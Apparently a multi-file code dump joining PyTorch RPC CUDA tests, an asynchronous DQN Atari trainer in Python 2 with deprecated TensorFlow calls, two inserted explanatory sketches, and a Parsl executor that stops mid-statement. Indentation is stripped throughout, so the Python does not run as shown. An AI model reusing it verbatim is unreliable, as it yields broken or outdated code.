with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_async_execution_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t = torch.zeros((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 1).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_async_execution_nested_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
nested_dst = worker_name((self.rank + 2) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
a = torch.ones((100,), device="cuda:0")
b = torch.ones((100,), device="cuda:0")
c = torch.ones((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 3).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_modify_tensor_inplace(self):
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
future.set_result(tensor)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
tensor.fill_(1)
future.wait()
@skip_if_lt_x_gpu(1)
def test_cuda_future_replace_tensor(self):
tensor_list = [torch.zeros((100,), device="cuda:0")]
future = Future(devices=["cuda:0"])
future.set_result(tensor_list)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
# We set things up so that the original tensor contained in the list
# gets deleted once we replace it with the other one. This will
# invalidate any cached information held by the future.
tensor_list[0] = torch.ones((100,), device="cuda:0")
future.wait()
@skip_if_lt_x_gpu(1)
def test_rref_with_unpickleable_attributes(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(dst, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
rref.rpc_sync().increase(1)
ret = rref.rpc_sync().sum()
self.assertEqual(ret, 42)
rpc.shutdown()
|
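The tests above configure CUDA device maps in many combinations, but never show the pattern end to end outside the test harness. Below is a minimal, self-contained sketch of the same idea: the caller maps its cuda:0 onto the callee's cuda:1, so argument tensors arrive on the mapped device and replies come back through the inverse map. The worker names, ranks, rendezvous address, and helper function are illustrative assumptions, not values from the test suite, and the sketch presumes two processes with at least two visible GPUs.

import torch
import torch.distributed.rpc as rpc

def remote_double(x):
    # Runs on the callee; the device map decides which GPU x lands on.
    return x * 2

def run(rank, world_size):
    options = rpc.TensorPipeRpcBackendOptions(
        init_method="tcp://127.0.0.1:29500",  # assumed rendezvous address
        num_worker_threads=8,
    )
    if rank == 0:
        # Map caller cuda:0 -> callee cuda:1 for RPCs sent to worker1.
        options.set_device_map("worker1", {0: 1})
    rpc.init_rpc(
        name=f"worker{rank}",
        rank=rank,
        world_size=world_size,
        rpc_backend_options=options,
    )
    if rank == 0:
        x = torch.ones(2, device="cuda:0")
        ret = rpc.rpc_sync("worker1", remote_double, args=(x,))
        # Replies travel through the inverse map, so the result lands on cuda:0.
        assert ret.device == torch.device("cuda:0")
    rpc.shutdown()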
async_dqn.py
|
#!/usr/bin/env python
import os
os.environ["KERAS_BACKEND"] = "tensorflow"
from skimage.transform import resize
from skimage.color import rgb2gray
from atari_environment import AtariEnvironment
import threading
import tensorflow as tf
import sys
import random
import numpy as np
import time
import gym
from keras import backend as K
from model import build_network
flags = tf.app.flags
flags.DEFINE_string('experiment', 'dqn_breakout', 'Name of the current experiment')
flags.DEFINE_string('game', 'Breakout-v0', 'Name of the atari game to play. Full list here: https://gym.openai.com/envs#atari')
flags.DEFINE_integer('num_concurrent', 8, 'Number of concurrent actor-learner threads to use during training.')
flags.DEFINE_integer('tmax', 80000000, 'Number of training timesteps.')
flags.DEFINE_integer('resized_width', 84, 'Scale screen to this width.')
flags.DEFINE_integer('resized_height', 84, 'Scale screen to this height.')
flags.DEFINE_integer('agent_history_length', 4, 'Use this number of recent screens as the environment state.')
flags.DEFINE_integer('network_update_frequency', 32, 'Frequency with which each actor learner thread does an async gradient update')
flags.DEFINE_integer('target_network_update_frequency', 10000, 'Reset the target network every n timesteps')
flags.DEFINE_float('learning_rate', 0.0001, 'Initial learning rate.')
flags.DEFINE_float('gamma', 0.99, 'Reward discount rate.')
flags.DEFINE_integer('anneal_epsilon_timesteps', 1000000, 'Number of timesteps to anneal epsilon.')
flags.DEFINE_string('summary_dir', '/tmp/summaries', 'Directory for storing tensorboard summaries')
flags.DEFINE_string('checkpoint_dir', '/tmp/checkpoints', 'Directory for storing model checkpoints')
flags.DEFINE_integer('summary_interval', 5,
'Save training summary to file every n seconds (rounded '
                     'up to statistics interval).')
flags.DEFINE_integer('checkpoint_interval', 600,
'Checkpoint the model (i.e. save the parameters) every n '
                     'seconds (rounded up to statistics interval).')
flags.DEFINE_boolean('show_training', True, 'If true, have gym render environments during training')
flags.DEFINE_boolean('testing', False, 'If true, run gym evaluation')
flags.DEFINE_string('checkpoint_path', 'path/to/recent.ckpt', 'Path to recent checkpoint to use for evaluation')
flags.DEFINE_string('eval_dir', '/tmp/', 'Directory to store gym evaluation')
flags.DEFINE_integer('num_eval_episodes', 100, 'Number of episodes to run gym evaluation.')
FLAGS = flags.FLAGS
T = 0
TMAX = FLAGS.tmax
def sample_final_epsilon():
"""
Sample a final epsilon value to anneal towards from a distribution.
These values are specified in section 5.1 of http://arxiv.org/pdf/1602.01783v1.pdf
"""
final_epsilons = np.array([.1,.01,.5])
probabilities = np.array([0.4,0.3,0.3])
return np.random.choice(final_epsilons, 1, p=list(probabilities))[0]
def actor_learner_thread(thread_id, env, session, graph_ops, num_actions, summary_ops, saver):
"""
Actor-learner thread implementing asynchronous one-step Q-learning, as specified
in algorithm 1 here: http://arxiv.org/pdf/1602.01783v1.pdf.
"""
global TMAX, T
# Unpack graph ops
s = graph_ops["s"]
q_values = graph_ops["q_values"]
st = graph_ops["st"]
target_q_values = graph_ops["target_q_values"]
reset_target_network_params = graph_ops["reset_target_network_params"]
a = graph_ops["a"]
y = graph_ops["y"]
grad_update = graph_ops["grad_update"]
summary_placeholders, update_ops, summary_op = summary_ops
# Wrap env with AtariEnvironment helper class
env = AtariEnvironment(gym_env=env, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height, agent_history_length=FLAGS.agent_history_length)
# Initialize network gradients
s_batch = []
a_batch = []
y_batch = []
final_epsilon = sample_final_epsilon()
initial_epsilon = 1.0
epsilon = 1.0
print "Starting thread ", thread_id, "with final epsilon ", final_epsilon
time.sleep(3*thread_id)
t = 0
while T < TMAX:
# Get initial game observation
s_t = env.get_initial_state()
terminal = False
# Set up per-episode counters
ep_reward = 0
episode_ave_max_q = 0
ep_t = 0
while True:
# Forward the deep q network, get Q(s,a) values
readout_t = q_values.eval(session = session, feed_dict = {s : [s_t]})
# Choose next action based on e-greedy policy
a_t = np.zeros([num_actions])
action_index = 0
if random.random() <= epsilon:
action_index = random.randrange(num_actions)
else:
action_index = np.argmax(readout_t)
a_t[action_index] = 1
# Scale down epsilon
if epsilon > final_epsilon:
epsilon -= (initial_epsilon - final_epsilon) / FLAGS.anneal_epsilon_timesteps
            # Gym executes action in game environment on behalf of actor-learner
s_t1, r_t, terminal, info = env.step(action_index)
# Accumulate gradients
readout_j1 = target_q_values.eval(session = session, feed_dict = {st : [s_t1]})
clipped_r_t = np.clip(r_t, -1, 1)
if terminal:
y_batch.append(clipped_r_t)
else:
y_batch.append(clipped_r_t + FLAGS.gamma * np.max(readout_j1))
a_batch.append(a_t)
s_batch.append(s_t)
# Update the state and counters
s_t = s_t1
T += 1
t += 1
ep_t += 1
ep_reward += r_t
episode_ave_max_q += np.max(readout_t)
# Optionally update target network
if T % FLAGS.target_network_update_frequency == 0:
session.run(reset_target_network_params)
# Optionally update online network
if t % FLAGS.network_update_frequency == 0 or terminal:
if s_batch:
session.run(grad_update, feed_dict = {y : y_batch,
a : a_batch,
s : s_batch})
# Clear gradients
s_batch = []
a_batch = []
y_batch = []
# Save model progress
if t % FLAGS.checkpoint_interval == 0:
saver.save(session, FLAGS.checkpoint_dir+"/"+FLAGS.experiment+".ckpt", global_step = t)
# Print end of episode stats
if terminal:
stats = [ep_reward, episode_ave_max_q/float(ep_t), epsilon]
for i in range(len(stats)):
session.run(update_ops[i], feed_dict={summary_placeholders[i]:float(stats[i])})
print "THREAD:", thread_id, "/ TIME", T, "/ TIMESTEP", t, "/ EPSILON", epsilon, "/ REWARD", ep_reward, "/ Q_MAX %.4f" % (episode_ave_max_q/float(ep_t)), "/ EPSILON PROGRESS", t/float(FLAGS.anneal_epsilon_timesteps)
break
def build_graph(num_actions):
# Create shared deep q network
s, q_network = build_network(num_actions=num_actions, agent_history_length=FLAGS.agent_history_length, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height)
network_params = q_network.trainable_weights
q_values = q_network(s)
# Create shared target network
st, target_q_network = build_network(num_actions=num_actions, agent_history_length=FLAGS.agent_history_length, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height)
target_network_params = target_q_network.trainable_weights
target_q_values = target_q_network(st)
# Op for periodically updating target network with online network weights
reset_target_network_params = [target_network_params[i].assign(network_params[i]) for i in range(len(target_network_params))]
# Define cost and gradient update op
a = tf.placeholder("float", [None, num_actions])
y = tf.placeholder("float", [None])
action_q_values = tf.reduce_sum(tf.mul(q_values, a), reduction_indices=1)
cost = tf.reduce_mean(tf.square(y - action_q_values))
optimizer = tf.train.AdamOptimizer(FLAGS.learning_rate)
grad_update = optimizer.minimize(cost, var_list=network_params)
graph_ops = {"s" : s,
"q_values" : q_values,
"st" : st,
"target_q_values" : target_q_values,
"reset_target_network_params" : reset_target_network_params,
"a" : a,
"y" : y,
"grad_update" : grad_update}
return graph_ops
# Set up some episode summary ops to visualize on tensorboard.
def setup_summaries():
episode_reward = tf.Variable(0.)
tf.scalar_summary("Episode Reward", episode_reward)
episode_ave_max_q = tf.Variable(0.)
tf.scalar_summary("Max Q Value", episode_ave_max_q)
logged_epsilon = tf.Variable(0.)
tf.scalar_summary("Epsilon", logged_epsilon)
logged_T = tf.Variable(0.)
summary_vars = [episode_reward, episode_ave_max_q, logged_epsilon]
summary_placeholders = [tf.placeholder("float") for i in range(len(summary_vars))]
update_ops = [summary_vars[i].assign(summary_placeholders[i]) for i in range(len(summary_vars))]
summary_op = tf.merge_all_summaries()
return summary_placeholders, update_ops, summary_op
def get_num_actions():
"""
Returns the number of possible actions for the given atari game
"""
# Figure out number of actions from gym env
env = gym.make(FLAGS.game)
num_actions = env.action_space.n
if (FLAGS.game == "Pong-v0" or FLAGS.game == "Breakout-v0"):
# Gym currently specifies 6 actions for pong
# and breakout when only 3 are needed. This
# is a lame workaround.
num_actions = 3
return num_actions
def train(session, graph_ops, num_actions, saver):
# Initialize target network weights
session.run(graph_ops["reset_target_network_params"])
# Set up game environments (one per thread)
envs = [gym.make(FLAGS.game) for i in range(FLAGS.num_concurrent)]
summary_ops = setup_summaries()
summary_op = summary_ops[-1]
# Initialize variables
session.run(tf.initialize_all_variables())
summary_save_path = FLAGS.summary_dir + "/" + FLAGS.experiment
writer = tf.train.SummaryWriter(summary_save_path, session.graph)
if not os.path.exists(FLAGS.checkpoint_dir):
os.makedirs(FLAGS.checkpoint_dir)
# Start num_concurrent actor-learner training threads
actor_learner_threads = [threading.Thread(target=actor_learner_thread, args=(thread_id, envs[thread_id], session, graph_ops, num_actions, summary_ops, saver)) for thread_id in range(FLAGS.num_concurrent)]
for t in actor_learner_threads:
t.start()
# Show the agents training and write summary statistics
last_summary_time = 0
while True:
if FLAGS.show_training:
for env in envs:
env.render()
now = time.time()
if now - last_summary_time > FLAGS.summary_interval:
summary_str = session.run(summary_op)
writer.add_summary(summary_str, float(T))
last_summary_time = now
for t in actor_learner_threads:
t.join()
def evaluation(session, graph_ops, saver):
saver.restore(session, FLAGS.checkpoint_path)
print "Restored model weights from ", FLAGS.checkpoint_path
monitor_env = gym.make(FLAGS.game)
monitor_env.monitor.start(FLAGS.eval_dir+"/"+FLAGS.experiment+"/eval")
# Unpack graph ops
s = graph_ops["s"]
q_values = graph_ops["q_values"]
# Wrap env with AtariEnvironment helper class
env = AtariEnvironment(gym_env=monitor_env, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height, agent_history_length=FLAGS.agent_history_length)
for i_episode in xrange(FLAGS.num_eval_episodes):
s_t = env.get_initial_state()
ep_reward = 0
terminal = False
while not terminal:
monitor_env.render()
readout_t = q_values.eval(session = session, feed_dict = {s : [s_t]})
action_index = np.argmax(readout_t)
s_t1, r_t, terminal, info = env.step(action_index)
s_t = s_t1
ep_reward += r_t
print ep_reward
monitor_env.monitor.close()
def main(_):
g = tf.Graph()
with g.as_default(), tf.Session() as session:
K.set_session(session)
num_actions = get_num_actions()
graph_ops = build_graph(num_actions)
saver = tf.train.Saver()
if FLAGS.testing:
evaluation(session, graph_ops, saver)
else:
train(session, graph_ops, num_actions, saver)
if __name__ == "__main__":
tf.app.run()
|
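The inner loop of actor_learner_thread above builds y_batch from the one-step Q-learning target: the clipped reward alone at terminal states, otherwise the clipped reward plus the discounted maximum target-network Q-value at the next state. The standalone NumPy sketch below restates that target with assumed names so the arithmetic can be checked in isolation; it is not part of the training script.

import numpy as np

def one_step_q_target(reward, terminal, target_q_next, gamma=0.99):
    # Clip the raw reward to [-1, 1], matching the clipping in the thread above.
    clipped_r = float(np.clip(reward, -1, 1))
    if terminal:
        return clipped_r
    # Bootstrap from the target network's best action value at the next state.
    return clipped_r + gamma * float(np.max(target_q_next))

# Non-terminal step: reward 1 and target Q-values [0.2, 0.5, 0.1]
# give 1 + 0.99 * 0.5 = 1.495.
assert abs(one_step_q_target(1.0, False, np.array([0.2, 0.5, 0.1])) - 1.495) < 1e-9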
executor.py
|
from concurrent.futures import Future
import typeguard
import logging
import threading
import queue
import datetime
import pickle
from multiprocessing import Queue
from typing import Dict # noqa F401 (used in type annotation)
from typing import List, Optional, Tuple, Union
import math
from parsl.serialize import pack_apply_message, deserialize
from parsl.app.errors import RemoteExceptionWrapper
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import (
BadMessage, ScalingFailed,
DeserializationError, SerializationError,
UnsupportedFeatureError
)
from parsl.executors.status_handling import BlockProviderExecutor
from parsl.providers.provider_base import ExecutionProvider
from parsl.data_provider.staging import Staging
from parsl.addresses import get_all_addresses
from parsl.process_loggers import wrap_with_logs
from parsl.multiprocessing import ForkProcess
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
class HighThroughputExecutor(BlockProviderExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
    2. The Interchange, which acts as a load-balancing proxy between workers and Parsl.
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Each of the workers in each process_worker_pool has access to its local rank through
    an environment variable, ``PARSL_WORKER_RANK``. The local rank is unique for each process
    and is an integer in the range from 0 to the number of workers in the pool minus 1.
The workers also have access to the ID of the worker pool as ``PARSL_WORKER_POOL_ID``
and the size of the worker pool as ``PARSL_WORKER_COUNT``.
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
        cores_per_worker, nodes_per_block, heartbeat_period, heartbeat_threshold, logdir). For example:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by ``hostname`` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes.
By default, the executor will attempt to enumerate and connect through all possible addresses.
Setting an address here overrides the default behavior.
default=None
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
mem_per_worker : float
GB of memory required per worker. If this option is specified, the node manager
will check the available memory at startup and limit the number of workers such that
        there is sufficient memory for each worker. Default: None
max_workers : int
Caps the number of workers launched per node. Default: infinity
cpu_affinity: string
Whether or how each worker process sets thread affinity. Options are "none" to forgo
any CPU affinity configuration, "block" to assign adjacent cores to workers
(ex: assign 0-1 to worker 0, 2-3 to worker 1), and
"alternating" to assign cores to workers in round-robin
(ex: assign 0,2 to worker 0, 1,3 to worker 1).
prefetch_capacity : int
Number of tasks that could be prefetched over available worker capacity.
When there are a few tasks (<100) or when tasks are long running, this option should
be set to 0 for better load balancing. Default is 0.
address_probe_timeout : int | None
        Managers attempt connecting over many different addresses to determine a viable address.
This option sets a time limit in seconds on the connection attempt.
Default of None implies 30s timeout set on worker.
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
        (interchange, manager) after which the counterpart is assumed to be unavailable. Default: 120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
counterpart (interchange, manager). Default: 30s
poll_period : int
Timeout period to be used by the executor components in milliseconds. Increasing poll_periods
trades performance for cpu efficiency. Default: 10ms
worker_logdir_root : string
In case of a remote file system, specify the path to where logs will be kept.
"""
@typeguard.typechecked
def __init__(self,
label: str = 'HighThroughputExecutor',
provider: ExecutionProvider = LocalProvider(),
launch_cmd: Optional[str] = None,
address: Optional[str] = None,
worker_ports: Optional[Tuple[int, int]] = None,
worker_port_range: Optional[Tuple[int, int]] = (54000, 55000),
interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000),
storage_access: Optional[List[Staging]] = None,
working_dir: Optional[str] = None,
worker_debug: bool = False,
cores_per_worker: float = 1.0,
mem_per_worker: Optional[float] = None,
max_workers: Union[int, float] = float('inf'),
cpu_affinity: str = 'none',
prefetch_capacity: int = 0,
heartbeat_threshold: int = 120,
heartbeat_period: int = 30,
poll_period: int = 10,
address_probe_timeout: Optional[int] = None,
managed: bool = True,
worker_logdir_root: Optional[str] = None):
logger.debug("Initializing HighThroughputExecutor")
BlockProviderExecutor.__init__(self, provider)
self.label = label
self.launch_cmd = launch_cmd
self.worker_debug = worker_debug
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
self.cores_per_worker = cores_per_worker
self.mem_per_worker = mem_per_worker
self.max_workers = max_workers
self.prefetch_capacity = prefetch_capacity
self.address = address
self.address_probe_timeout = address_probe_timeout
if self.address:
self.all_addresses = address
else:
self.all_addresses = ','.join(get_all_addresses())
mem_slots = max_workers
cpu_slots = max_workers
if hasattr(self.provider, 'mem_per_node') and \
self.provider.mem_per_node is not None and \
mem_per_worker is not None and \
mem_per_worker > 0:
mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker)
if hasattr(self.provider, 'cores_per_node') and \
self.provider.cores_per_node is not None:
cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker)
self._workers_per_node = min(max_workers, mem_slots, cpu_slots)
if self._workers_per_node == float('inf'):
self._workers_per_node = 1 # our best guess-- we do not have any provider hints
self._task_counter = 0
self.run_id = None # set to the correct run_id in dfk
self.hub_address = None # set to the correct hub address in dfk
self.hub_port = None # set to the correct hub port in dfk
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.heartbeat_threshold = heartbeat_threshold
self.heartbeat_period = heartbeat_period
self.poll_period = poll_period
self.run_dir = '.'
self.worker_logdir_root = worker_logdir_root
self.cpu_affinity = cpu_affinity
if not launch_cmd:
self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
"-a {addresses} "
"-p {prefetch_capacity} "
"-c {cores_per_worker} "
"-m {mem_per_worker} "
"--poll {poll_period} "
"--task_port={task_port} "
"--result_port={result_port} "
"--logdir={logdir} "
"--block_id={{block_id}} "
"--hb_period={heartbeat_period} "
"{address_probe_timeout_string} "
"--hb_threshold={heartbeat_threshold} "
"--cpu-affinity {cpu_affinity} ")
def initialize_scaling(self):
""" Compose the launch command and call the scale_out
This should be implemented in the child classes to take care of
executor specific oddities.
"""
debug_opts = "--debug" if self.worker_debug else ""
max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)
address_probe_timeout_string = ""
if self.address_probe_timeout:
address_probe_timeout_string = "--address_probe_timeout={}".format(self.address_probe_timeout)
worker_logdir = "{}/{}".format(self.run_dir, self.label)
if self.worker_logdir_root is not None:
worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label)
l_cmd = self.launch_cmd.format(debug=debug_opts,
prefetch_capacity=self.prefetch_capacity,
address_probe_timeout_string=address_probe_timeout_string,
addresses=self.all_addresses,
task_port=self.worker_task_port,
result_port=self.worker_result_port,
cores_per_worker=self.cores_per_worker,
mem_per_worker=self.mem_per_worker,
max_workers=max_workers,
nodes_per_block=self.provider.nodes_per_block,
heartbeat_period=self.heartbeat_period,
heartbeat_threshold=self.heartbeat_threshold,
poll_period=self.poll_period,
logdir=worker_logdir,
cpu_affinity=self.cpu_affinity)
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = True
logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
# TODO: why is this a provider property?
block_ids = []
if hasattr(self.provider, 'init_blocks'):
try:
block_ids = self.scale_out(blocks=self.provider.init_blocks)
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
return block_ids
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}".format(self._queue_management_thread))
block_ids = self.initialize_scaling()
return block_ids
@wrap_with_logs
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
logger.debug("[MTHREAD] queue management worker starting")
while not self.bad_state_is_set:
try:
msgs = self.incoming_q.get(timeout=1)
except queue.Empty:
logger.debug("[MTHREAD] queue empty")
# Timed out.
pass
except IOError as e:
logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
return
else:
if msgs is None:
logger.debug("[MTHREAD] Got None, exiting")
return
else:
for serialized_msg in msgs:
try:
msg = pickle.loads(serialized_msg)
tid = msg['task_id']
except pickle.UnpicklingError:
raise BadMessage("Message received could not be unpickled")
except Exception:
raise BadMessage("Message received does not contain 'task_id' field")
if tid == -1 and 'exception' in msg:
logger.warning("Executor shutting down due to exception from interchange")
exception = deserialize(msg['exception'])
self.set_bad_state_and_fail_all(exception)
break
elif tid == -1 and 'heartbeat' in msg:
continue
task_fut = self.tasks.pop(tid)
if 'result' in msg:
result = deserialize(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
try:
s = deserialize(msg['exception'])
# s should be a RemoteExceptionWrapper... so we can reraise it
if isinstance(s, RemoteExceptionWrapper):
try:
s.reraise()
except Exception as e:
task_fut.set_exception(e)
elif isinstance(s, Exception):
task_fut.set_exception(s)
else:
raise ValueError("Unknown exception-like type received: {}".format(type(s)))
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
                            raise BadMessage("Message received is neither result nor exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
def _start_local_queue_process(self):
""" Starts the interchange process locally
Starts the interchange process locally and uses an internal command queue to
get the worker task and result ports that the interchange has bound to.
"""
comm_q = Queue(maxsize=10)
self.queue_proc = ForkProcess(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port,
self.command_client.port),
"worker_ports": self.worker_ports,
"worker_port_range": self.worker_port_range,
"hub_address": self.hub_address,
"hub_port": self.hub_port,
"logdir": "{}/{}".format(self.run_dir, self.label),
"heartbeat_threshold": self.heartbeat_threshold,
"poll_period": self.poll_period,
"logging_level": logging.DEBUG if self.worker_debug else logging.INFO
},
daemon=True,
name="HTEX-Interchange"
)
self.queue_proc.start()
try:
(self.worker_task_port, self.worker_result_port) = comm_q.get(block=True, timeout=120)
except queue.Empty:
logger.error("Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker, name="HTEX-Queue-Management-Thread")
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def hold_worker(self, worker_id):
"""Puts a worker on hold, preventing scheduling of additional tasks to it.
This is called "hold" mostly because this only stops scheduling of tasks,
and does not actually kill the worker.
Parameters
----------
worker_id : str
Worker id to be put on hold
"""
c = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
logger.debug("Sent hold request to manager: {}".format(worker_id))
return c
@property
def outstanding(self):
outstanding_c = self.command_client.run("OUTSTANDING_C")
return outstanding_c
@property
def connected_workers(self):
workers = self.command_client.run("WORKERS")
return workers
@property
def connected_managers(self):
workers = self.command_client.run("MANAGERS")
return workers
def _hold_block(self, block_id):
""" Sends hold command to all managers which are in a specific block
Parameters
----------
block_id : str
Block identifier of the block to be put on hold
"""
managers = self.connected_managers
for manager in managers:
if manager['block_id'] == block_id:
logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(manager['manager']))
self.hold_worker(manager['manager'])
def submit(self, func, resource_specification, *args, **kwargs):
"""Submits work to the the outgoing_q.
        The outgoing_q is a queue that an external process listens on for new
        work. This method behaves like a submit call as described in the
        `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- args (list) : List of arbitrary positional arguments.
Kwargs:
- kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
if resource_specification:
logger.error("Ignoring the resource specification. "
"Parsl resource specification is not supported in HighThroughput Executor. "
"Please check WorkQueueExecutor if resource specification is needed.")
raise UnsupportedFeatureError('resource specification', 'HighThroughput Executor', 'WorkQueue Executor')
if self.bad_state_is_set:
raise self.executor_exception
self._task_counter += 1
task_id = self._task_counter
# handle people sending blobs gracefully
args_to_print = args
if logger.getEffectiveLevel() >= logging.DEBUG:
args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args])
logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print))
fut = Future()
self.tasks[task_id] = fut
try:
fn_buf = pack_apply_message(func, args, kwargs,
